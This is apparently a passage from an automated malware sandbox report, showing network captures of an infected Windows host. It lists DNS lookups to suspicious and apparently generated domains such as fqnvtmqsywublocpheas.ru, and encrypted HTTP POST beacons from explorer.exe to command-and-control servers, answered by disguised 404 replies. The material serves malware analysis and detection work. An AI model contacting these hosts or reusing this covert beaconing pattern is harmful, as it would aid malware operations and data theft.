Sep 13, 2020 20:55:18.075397015 CEST	80	49724	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:22.561002016 CEST	49720	443	192.168.2.3	195.201.225.248
Sep 13, 2020 20:55:47.867191076 CEST	49717	80	192.168.2.3	109.94.209.7
Sep 13, 2020 20:55:47.931583881 CEST	80	49717	109.94.209.7	192.168.2.3
Sep 13, 2020 20:55:47.931737900 CEST	49717	80	192.168.2.3	109.94.209.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 13, 2020 20:54:39.783777952 CEST	59661	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:54:39.810545921 CEST	53	59661	8.8.8.8	192.168.2.3
Sep 13, 2020 20:54:41.402146101 CEST	59376	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:54:41.433582067 CEST	53	59376	8.8.8.8	192.168.2.3
Sep 13, 2020 20:54:41.455899954 CEST	61201	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:54:41.580817938 CEST	53	61201	8.8.8.8	192.168.2.3
Sep 13, 2020 20:54:42.021594048 CEST	55579	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:54:42.036892891 CEST	53	55579	8.8.8.8	192.168.2.3
Sep 13, 2020 20:54:42.187319994 CEST	60640	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:54:42.203449965 CEST	53	60640	8.8.8.8	192.168.2.3
Sep 13, 2020 20:54:48.952092886 CEST	49851	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:54:48.967843056 CEST	53	49851	8.8.8.8	192.168.2.3
Sep 13, 2020 20:55:04.920383930 CEST	61636	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:55:05.240441084 CEST	53	61636	8.8.8.8	192.168.2.3
Sep 13, 2020 20:55:06.186093092 CEST	53233	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:55:06.477150917 CEST	53	53233	8.8.8.8	192.168.2.3
Sep 13, 2020 20:55:17.214010954 CEST	57798	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:55:17.845331907 CEST	53	57798	8.8.8.8	192.168.2.3
Sep 13, 2020 20:55:25.865339994 CEST	61961	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:55:25.902029037 CEST	53	61961	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:00.858242989 CEST	56270	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:00.904114008 CEST	53	56270	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:00.966895103 CEST	59888	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:01.016684055 CEST	53	59888	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:06.056797981 CEST	57481	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:06.073692083 CEST	53	57481	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:06.108760118 CEST	54181	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:06.365829945 CEST	53	54181	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:11.417220116 CEST	58279	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:11.434387922 CEST	53	58279	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:11.451844931 CEST	54532	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:11.467838049 CEST	53	54532	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:11.479830027 CEST	57266	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:11.631462097 CEST	53	57266	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:11.663825035 CEST	51680	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:11.715114117 CEST	53	51680	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:16.753699064 CEST	61119	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:16.769495964 CEST	53	61119	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:16.781316042 CEST	51368	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:16.872848988 CEST	53	51368	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:21.931940079 CEST	55370	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:21.948385000 CEST	53	55370	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:21.970880985 CEST	63490	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:21.986840963 CEST	53	63490	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:22.164452076 CEST	58094	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:22.239592075 CEST	53	58094	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:27.992292881 CEST	52765	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:28.008114100 CEST	53	52765	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:28.181984901 CEST	61512	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:28.197856903 CEST	53	61512	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:33.342031002 CEST	60314	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:33.357846022 CEST	53	60314	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:33.490447998 CEST	60650	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:33.506218910 CEST	53	60650	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:38.633567095 CEST	60913	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:38.650052071 CEST	53	60913	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:38.740367889 CEST	64453	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:38.817378044 CEST	53	64453	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:38.942944050 CEST	51679	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:38.960688114 CEST	53	51679	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:39.096822977 CEST	57515	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:39.148499966 CEST	53	57515	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:44.332866907 CEST	54046	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:44.384162903 CEST	53	54046	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:44.522242069 CEST	49458	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:44.538211107 CEST	53	49458	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:49.720415115 CEST	63942	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:49.736911058 CEST	53	63942	8.8.8.8	192.168.2.3
Sep 13, 2020 20:56:49.866199970 CEST	64406	53	192.168.2.3	8.8.8.8
Sep 13, 2020 20:56:49.882075071 CEST	53	64406	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 13, 2020 20:54:41.402146101 CEST	192.168.2.3	8.8.8.8	0xe99	Standard query (0)	dkajsdjiqwdwnfj.info	A (IP address)	IN (0x0001)
Sep 13, 2020 20:54:41.455899954 CEST	192.168.2.3	8.8.8.8	0x16e1	Standard query (0)	2831ujedkdajsdj.info	A (IP address)	IN (0x0001)
Sep 13, 2020 20:54:48.952092886 CEST	192.168.2.3	8.8.8.8	0xc2f7	Standard query (0)	telete.in	A (IP address)	IN (0x0001)
Sep 13, 2020 20:55:04.920383930 CEST	192.168.2.3	8.8.8.8	0x228a	Standard query (0)	chinadevmonster.top	A (IP address)	IN (0x0001)
Sep 13, 2020 20:55:06.186093092 CEST	192.168.2.3	8.8.8.8	0x4cce	Standard query (0)	chinadevmonster.top	A (IP address)	IN (0x0001)
Sep 13, 2020 20:55:17.214010954 CEST	192.168.2.3	8.8.8.8	0xf23e	Standard query (0)	chinadevmonster.top	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:00.858242989 CEST	192.168.2.3	8.8.8.8	0x30ee	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:00.966895103 CEST	192.168.2.3	8.8.8.8	0x1f97	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:06.056797981 CEST	192.168.2.3	8.8.8.8	0x85c3	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:06.108760118 CEST	192.168.2.3	8.8.8.8	0x80f3	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.417220116 CEST	192.168.2.3	8.8.8.8	0x65d4	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.451844931 CEST	192.168.2.3	8.8.8.8	0xa6af	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.479830027 CEST	192.168.2.3	8.8.8.8	0x1fa1	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.663825035 CEST	192.168.2.3	8.8.8.8	0xf6a2	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:16.753699064 CEST	192.168.2.3	8.8.8.8	0xa6b	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:16.781316042 CEST	192.168.2.3	8.8.8.8	0x583c	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:21.931940079 CEST	192.168.2.3	8.8.8.8	0x7ab8	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:21.970880985 CEST	192.168.2.3	8.8.8.8	0xd9c7	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:22.164452076 CEST	192.168.2.3	8.8.8.8	0x5bb	Standard query (0)	fqnvtmqsywublocpheas.eu	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:27.992292881 CEST	192.168.2.3	8.8.8.8	0xa4c7	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:28.181984901 CEST	192.168.2.3	8.8.8.8	0xe164	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:33.342031002 CEST	192.168.2.3	8.8.8.8	0x42cc	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:33.490447998 CEST	192.168.2.3	8.8.8.8	0xdad9	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:38.633567095 CEST	192.168.2.3	8.8.8.8	0xe325	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:38.740367889 CEST	192.168.2.3	8.8.8.8	0x9819	Standard query (0)	fqnvtmqsywublocpheas.ru	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:38.942944050 CEST	192.168.2.3	8.8.8.8	0x5dff	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:39.096822977 CEST	192.168.2.3	8.8.8.8	0xc0e0	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:44.332866907 CEST	192.168.2.3	8.8.8.8	0x33f5	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:44.522242069 CEST	192.168.2.3	8.8.8.8	0x1543	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:49.720415115 CEST	192.168.2.3	8.8.8.8	0x36d	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:49.866199970 CEST	192.168.2.3	8.8.8.8	0xb160	Standard query (0)	fqnvtmqsywublocpheas.su	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 13, 2020 20:54:41.433582067 CEST	8.8.8.8	192.168.2.3	0xe99	Name error (3)	dkajsdjiqwdwnfj.info	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:54:41.580817938 CEST	8.8.8.8	192.168.2.3	0x16e1	No error (0)	2831ujedkdajsdj.info		109.94.209.7	A (IP address)	IN (0x0001)
Sep 13, 2020 20:54:48.967843056 CEST	8.8.8.8	192.168.2.3	0xc2f7	No error (0)	telete.in		195.201.225.248	A (IP address)	IN (0x0001)
Sep 13, 2020 20:55:05.240441084 CEST	8.8.8.8	192.168.2.3	0x228a	No error (0)	chinadevmonster.top		47.245.136.23	A (IP address)	IN (0x0001)
Sep 13, 2020 20:55:06.477150917 CEST	8.8.8.8	192.168.2.3	0x4cce	No error (0)	chinadevmonster.top		47.245.136.23	A (IP address)	IN (0x0001)
Sep 13, 2020 20:55:17.845331907 CEST	8.8.8.8	192.168.2.3	0xf23e	No error (0)	chinadevmonster.top		47.245.136.23	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:00.904114008 CEST	8.8.8.8	192.168.2.3	0x30ee	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:01.016684055 CEST	8.8.8.8	192.168.2.3	0x1f97	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:06.073692083 CEST	8.8.8.8	192.168.2.3	0x85c3	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:06.365829945 CEST	8.8.8.8	192.168.2.3	0x80f3	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.434387922 CEST	8.8.8.8	192.168.2.3	0x65d4	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.467838049 CEST	8.8.8.8	192.168.2.3	0xa6af	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.631462097 CEST	8.8.8.8	192.168.2.3	0x1fa1	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:11.715114117 CEST	8.8.8.8	192.168.2.3	0xf6a2	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:16.769495964 CEST	8.8.8.8	192.168.2.3	0xa6b	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:16.872848988 CEST	8.8.8.8	192.168.2.3	0x583c	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:21.948385000 CEST	8.8.8.8	192.168.2.3	0x7ab8	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:21.986840963 CEST	8.8.8.8	192.168.2.3	0xd9c7	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:22.239592075 CEST	8.8.8.8	192.168.2.3	0x5bb	No error (0)	fqnvtmqsywublocpheas.eu		45.84.227.231	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:28.008114100 CEST	8.8.8.8	192.168.2.3	0xa4c7	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:28.197856903 CEST	8.8.8.8	192.168.2.3	0xe164	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:33.357846022 CEST	8.8.8.8	192.168.2.3	0x42cc	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:33.506218910 CEST	8.8.8.8	192.168.2.3	0xdad9	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:38.650052071 CEST	8.8.8.8	192.168.2.3	0xe325	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:38.817378044 CEST	8.8.8.8	192.168.2.3	0x9819	Name error (3)	fqnvtmqsywublocpheas.ru	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:38.960688114 CEST	8.8.8.8	192.168.2.3	0x5dff	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:39.148499966 CEST	8.8.8.8	192.168.2.3	0xc0e0	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:44.384162903 CEST	8.8.8.8	192.168.2.3	0x33f5	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:44.538211107 CEST	8.8.8.8	192.168.2.3	0x1543	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:49.736911058 CEST	8.8.8.8	192.168.2.3	0x36d	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)
Sep 13, 2020 20:56:49.882075071 CEST	8.8.8.8	192.168.2.3	0xb160	Name error (3)	fqnvtmqsywublocpheas.su	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

2831ujedkdajsdj.info

chinadevmonster.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49717	109.94.209.7	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Sep 13, 2020 20:54:41.654148102 CEST	63	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://2831ujedkdajsdj.info/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 336 Host: 2831ujedkdajsdj.info
Sep 13, 2020 20:54:41.654236078 CEST	63	OUT	Data Raw: dc 01 be a7 2e f5 54 65 3b e4 9c 0c 63 f7 46 5c ef 47 a1 61 82 90 b2 7a a1 fb 1a ad ea 22 ab 3a dc a2 6d 9e 0a 17 1a f3 b5 88 32 a2 42 bd 45 fc d7 64 9f d0 20 35 42 f3 2e f6 c1 af 3d a2 42 3f 4c 0a 7d 8c 6e 9b 64 39 f4 d8 56 35 a5 e3 72 75 73 e6 Data Ascii: .Te;cF\Gaz":m2BEd 5B.=B?L}nd9V5rusNY6NaA$DJ+v@&*T'C<KcGw@w]I?ohfDqhMlPu=]6XJo=u}tk/uB]cdP9b!
Sep 13, 2020 20:54:41.729074955 CEST	64	IN	HTTP/1.1 404 Not Found Server: nginx/1.16.1 Date: Sun, 13 Sep 2020 18:54:41 GMT Content-Type: text/html; charset=windows-1251 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.2.31 Data Raw: 31 38 0d 0a 13 00 00 00 63 07 35 6e ed cd cf 93 0a 8d c8 6b 6d 7d e5 a4 9e 64 5c 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 18c5nkm}d\0
Sep 13, 2020 20:54:41.742604971 CEST	64	OUT	POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://2831ujedkdajsdj.info/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: 2831ujedkdajsdj.info
Sep 13, 2020 20:54:41.742788076 CEST	64	OUT	Data Raw: dc 01 be a7 2e f5 54 65 3b e4 9c 0c 63 f7 46 5c ef 47 a1 61 82 90 b2 7a a1 fb 1a ad ea 22 ab 3a dc a2 6d 9e 0a 17 1a f3 b5 88 32 a2 42 bd 45 fc d7 64 9f d0 20 35 42 f3 2e f6 c1 af 3d a2 42 3f 4c 0a 7d 8c 6d 9b 64 39 f4 d8 57 35 a5 e3 56 7c 04 c7 Data Ascii: .Te;cF\Gaz":m2BEd 5B.=B?L}md9W5V\|^hHSo+O4*kk3yf}T8&d(I{vs6#R/T)q~$?f
Sep 13, 2020 20:54:41.821265936 CEST	66	IN	HTTP/1.1 404 Not Found Server: nginx/1.16.1 Date: Sun, 13 Sep 2020 18:54:41 GMT Content-Type: text/html; charset=windows-1251 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.2.31 Data Raw: 31 66 31 64 0d 0a 00 00 ca 5a 97 12 d4 b1 bf ff 7b ea a1 05 cd f1 8c de 43 59 6c bd 09 66 05 03 f2 e2 fa fe ea f4 23 60 6e 8f 5d ce 52 2d a6 db 7f b0 61 36 71 8b 2d ec 68 c1 2c 14 dd 60 30 ba 14 65 b5 75 53 11 cf e7 e4 b9 82 07 31 9f 48 c4 54 25 56 f0 90 a7 02 7e b3 7c aa 1e 21 e4 6f b7 44 ac 0e 1c ba 80 69 4e 9c b5 ad 2d 7b 1b 5e b1 4c c8 e0 77 3b 81 54 a5 72 04 79 2b 27 02 ee c1 3a 84 ea d3 a1 4f aa 7a f6 87 9e d8 f8 3d e0 d7 e4 f1 d8 87 a2 ee 06 0b 44 d7 f7 65 63 54 eb 8f d0 14 cb da f5 cc f9 91 97 ba 93 74 e7 4b 9e 9b 57 bc 21 43 76 b8 c2 d1 3a fd cc 36 dd b8 46 b4 66 b8 61 23 36 80 88 a6 c9 44 ce 42 1b af a4 6b df a2 cf 7f 79 af 1e ed 5e b6 15 64 a2 77 45 e9 98 a3 5f 76 d3 ff 13 c0 f2 73 96 ce 36 5f b3 64 44 e7 05 cd 07 e0 84 88 8d c9 88 4a 9a dd e3 dd 8f c1 60 93 0d cb a8 2a df a7 a3 a1 e2 ef ab 91 35 b2 8c 66 76 33 92 94 40 a6 f1 ce 3c da a5 48 30 89 03 33 55 c0 b1 a2 45 68 2b 5a bf 6d 02 98 0a c0 08 3e 43 8a 9b 7b 39 0b 42 f3 24 65 23 08 dd c2 61 d3 17 60 38 70 36 1c e4 4c 2f 2f 0f c9 eb 39 e7 c7 d5 be c9 93 e8 ba ac 55 61 c9 ba 03 a9 8d dc d6 cc a5 9a 1b 98 d6 6f 24 7f 4d 12 29 b6 a0 39 a1 72 c4 e7 0b 55 13 51 4b ed 39 51 f5 e5 25 38 05 0e 7f 45 06 6e d3 87 7f ac 8c cc 7e 52 4b 33 d0 c5 85 c0 ba 55 2a 46 8e ac 91 74 eb e0 62 57 af 14 41 5c 3d 1e e8 44 86 47 15 e7 9c 4a 61 05 54 8b 7e 6d ef 50 22 f1 91 45 94 6c f5 51 38 c8 68 87 cd 19 b1 2b f0 50 14 8c de d9 25 e0 47 b1 f6 dc 30 f0 21 74 cf eb 85 4b 7f 96 d3 a1 ba 23 87 28 94 9b 40 46 2c 54 f9 be 06 a4 2f bb f0 8b 57 5a e3 bf 0f 5e a7 0a fa 37 61 69 20 42 33 b6 7c 76 70 2f bb 51 56 8f 01 a5 2e 95 68 17 88 72 7b ab 1a 49 24 8d 71 08 b3 40 77 41 3d 80 fa 9e cd 66 05 5b 65 ad 31 82 8f cc ba 3a cc 07 05 55 b5 8e 2c bb a3 cb 08 74 80 ca 48 9a 61 16 a5 05 aa 84 9d 8c 9a e5 c4 9e a1 59 97 0e 49 23 54 40 9e 60 7f 92 b3 91 75 8b f8 92 d7 27 2b ef a7 0b e1 cc eb e2 4c a5 ba e4 9c d9 f4 c8 03 a4 ef 88 c5 ad 9c de 5c 81 63 24 c3 dd b5 a3 6b b4 a0 2f 89 60 ce 1a 8f 9d 8f e3 2b 30 9f ea a7 55 3b 17 c3 2c c0 6c af 23 16 fd 93 78 be 6b 44 de b9 9d 42 01 89 62 de 4b 37 35 6b 71 6e d6 d9 15 3f b0 91 74 63 e5 9c 4f 3b f8 00 fc 2b 15 13 4d 96 b0 fc 66 60 89 a1 e2 e2 db ba 22 9d fd a8 81 74 29 8a 4b 51 71 03 ba a0 76 82 ea 79 bb ab dc d5 23 07 04 a7 3d 20 0b de 92 89 81 5e a7 57 5e 33 a9 3b f0 4c 8e 09 39 df 12 5b 79 74 d7 fa 4c 7d 38 80 93 8a 18 55 10 7f 5a ce 85 53 17 33 80 60 a6 41 cd 09 0c b0 37 ff 11 89 eb c7 58 b3 2b c6 68 65 a2 31 e8 4c d7 c6 70 e1 4d 2c 06 c4 61 3f 25 33 61 b0 ce cb d1 7c 74 30 1f 3e d4 a1 ba d5 a4 f6 2b 2b 1f 09 b4 cb 3f 73 a0 62 ee 39 ac a8 bc de b4 0b 65 9e c5 49 66 93 e7 4b 85 b9 9d 99 fb 71 85 3f 6d 2a b8 f2 cf fd 67 e0 da da 9e ab ca 9c 9e 4e 3b a1 ae 35 b7 e3 8d 55 fc 76 cc 95 52 22 f3 84 9a 67 f5 70 36 a9 5d f6 2d 19 e2 ff 96 d7 54 df f8 f2 68 ee ab 4e 1d ee 5c ba e1 4f aa 6c 96 a5 49 f4 1f e0 ab 88 6b a2 48 c4 a5 3c 74 25 bf 43 9c 7b 27 bf 71 68 11 df eb 56 55 4b 53 76 4f 25 05 c2 7e 3c a7 23 91 5b 49 c9 af 5c 38 29 ee 87 bd 13 54 7a b1 45 78 d6 8f f3 2e ee fa 25 2a d1 08 74 7a 89 fc 3d e2 d0 38 67 90 16 3e 48 89 97 b4 1f e7 9d 1b 6d 5e 20 b7 74 e3 d1 2e d8 2e 1f cc 3f c9 f9 1e f3 81 8e 4f 2a 59 ef 27 66 77 d3 9d 69 f4 f2 18 b3 d9 b5 0e 10 fd 99 85 60 7c a7 18 22 a8 5a ad d3 b1 74 01 09 be 35 62 a9 5c 74 0a 08 18 8a 9d d1 de 51 70 c6 b6 fc 06 fc c0 aa 7d 3e fb 1e df 40 dc 61 cb cb 9f 3a 87 81 bf 07 39 99 74 07 6b a3 27 c1 41 6e a9 f4 5e 9e d4 1e bb 6e a8 c4 4f c7 a5 e2 cb ba f9 6b 16 28 b7 7c ba cc 4b 0f 11 da Data Ascii: 1f1dZ{CYlf#`n]R-a6q-h,`0euS1HT%V~\|!oDiN-{^Lw;Try+':Oz=DecTtKW!Cv:6Ffa#6DBky^dwE_vs6_dDJ`5fv3@<H03UEh+Zm>C{9B$e#a`8p6L//9Uao$M)9rUQK9Q%8En~RK3UFtbWA\=DGJaT~mP"ElQ8h+P%G0!tK#(@F,T/WZ^7ai B3\|vp/QV.hr{I$q@wA=f[e1:U,tHaYI#T@`u'+L\c$k/`+0U;,l#xkDBbK75kqn?tcO;+Mf`"t)KQqvy#= ^W^3;L9[ytL}8UZS3`A7X+he1LpM,a?%3a\|t0>++?sb9eIfKq?mgN;5UvR"gp6]-ThN\OlIkH<t%C{'qhVUKSvO%~<#[I\8)TzEx.%tz=8g>Hm^ t..?O*Y'fwi`\|"Zt5b\tQp}>@a:9tk'An^nOk(\|K
Sep 13, 2020 20:54:41.821301937 CEST	67	IN	Data Raw: 0d f6 6a c9 39 02 b9 6a 18 ed c6 1c 19 ef 3b 9b 17 d5 b6 46 81 85 cc dd 48 84 64 9e 58 77 1b e9 44 51 ef f5 93 5a b9 c5 6e a5 2e 0c 3d 5e 8f 40 39 77 14 34 0f 2a e7 2f df 0e ac 9f 87 21 fd f4 30 92 72 f4 86 87 7c 03 3e 02 97 91 78 8d b6 45 49 cd Data Ascii: j9j;FHdXwDQZn.=^@9w4/!0r\|>xEI39dUYtkIfn3@AhQ32[=eOe_hEu?I^}Sr2'"fjYl6c%pI-2:#b:\|GLh
Sep 13, 2020 20:54:41.821414948 CEST	68	IN	Data Raw: 45 ea 05 ca 00 4b 3f 37 e2 4d 73 ad 87 9b ff d9 46 e4 68 53 e5 02 f7 6f ce 99 ca 0f db 39 77 30 18 57 d6 83 04 75 31 c4 35 84 2c 42 4a 8f f4 2c 5b d6 60 89 3e eb da d1 a5 7e 20 aa 6d 48 5d b4 0a 89 92 cb f7 64 24 44 8b a0 44 a2 af cc c9 6a f7 81 Data Ascii: EK?7MsFhSo9w0Wu15,BJ,[`>~ mH]d$DDj7~sW%Dg);cjwF0?nCd6'u'%3es`?=j_z2mC&/zs.bY2g;[6?4^i\ff
Sep 13, 2020 20:54:41.821434975 CEST	70	IN	Data Raw: a9 6e d9 09 ef fb 9f a7 5a 69 eb 49 b4 54 31 89 1d fd 47 7a 0c ef 58 ce 00 97 ff ca d2 e6 06 49 aa db af bd 5f f5 85 86 36 16 b4 03 ab 70 dc 0c da 01 bf 43 f9 2d 84 99 0f 24 83 04 d1 ed 52 dc 2c 03 95 46 40 03 b0 30 e7 59 79 37 fb 44 72 9d f8 08 Data Ascii: nZiIT1GzXI_6pC-$R,F@0Yy7Drr]@--ap{/\|UH;A6%';^u:wg>#yNJ:[NX,^~+hRpj\&&F[B=K]0!C]3T`J+
